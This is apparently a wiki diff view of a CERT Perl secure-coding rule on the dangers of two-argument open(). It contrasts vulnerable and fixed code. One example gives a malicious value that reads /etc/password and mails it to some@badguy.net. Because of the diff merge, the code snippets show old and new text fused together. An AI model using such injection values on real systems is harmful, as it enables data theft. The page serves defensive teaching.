Versions Compared

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

open FILEHANDLE,EXPR
open FILEHANDLE,MODE,EXPR
open FILEHANDLE,MODE,EXPR,LIST
open FILEHANDLE,MODE,REFERENCE
open FILEHANDLE
Opens the file whose filename file name is given by EXPR , and associates it with FILEHANDLE.

...

Code Block
bgColor#ffcccc
langperl
my $filename = # initialize
open(my FILE$FILE, $filename) or croak("file not found");
while (<FILE><$FILE>) {
  print "$file$filename: $_";
};

Although this code clearly expects its file to be opened for reading, the file name might indicate a shell command. It might also indicate a file to be written rather than read.

...

Code Block
bgColor#ffcccc
langperl
my $filename = # initialize
open(my FILE$FILE, "<$filename") or croak("file not found");
while (<FILE><$FILE>) {
  print "$file$filename: $_";
};

If $filename begins or ends with |, the preceding < forces it to be treated as a file name rather than a shell command.
This code will not execute a shell command. However, an attacker could cause a program to hang by supplying - as the file name. This , which is interpreted by open() as reading standard input.

...

This code suffers from the same vulnerability as the first noncompliant code example. The <ARGV> operator opens every file provided in the @ARGV array and returns a line from each file. Unfortunately, it uses the two-argument form of open() to accomplish this task. If any element of @ARGV begins or ends with |, it is interpreted as a shell command and executed.

...

Code Block
bgColor#ccccff
langperl
my $filename = # initialize
open(my FILE$FILE, "<", $filename) or croak("file not found");
while (<FILE><$FILE>) {
  print "$file$filename: $_";
};

The three-argument invocations of open() are not subject to the same vulnerabilities as the two-argument open(). In this code, $filename is treated as a file name even if it contains characters that are treated specially by the two-argument open() function. For example, if $filename is specified as -, then the three-argument open() attempts to open a file named - rather than opening standard input.

...

Because any user can invoke the rt executable with environment variables he or she controls, a hostile user may set the RTCONFIG environment variable to a malicious command, such as:

Code Block
bgColor#ffcccc
	cat /etc/password | mail some@badguy.net |

...

This code causes $file to be treated as a file name regardless of what special characters it might contain.

Note that the last line of this compliant solution still violates FIO00-PL. Do not use bareword file handles.

Risk Assessment

Failure to handle error codes or other values returned by functions can lead to incorrect program flow and violations of data integrity.

Recommendation

Severity

Likelihood

Remediation Cost

Priority

Level

IDS31-PL

high

likely

low

P27

L1

Automated Detection

ToolDiagnostic

 Version

Checker

 Description

Perl::Critic

 5.0

InputOutput::ProhibitTwoArgOpen

Implemented 

B::Lint

 5.0

Use of <> 
Unterminated <> operator

 Implemented

Bibliography

...

...

...

...

 

 

...

Image Modified Image Modified Image Modified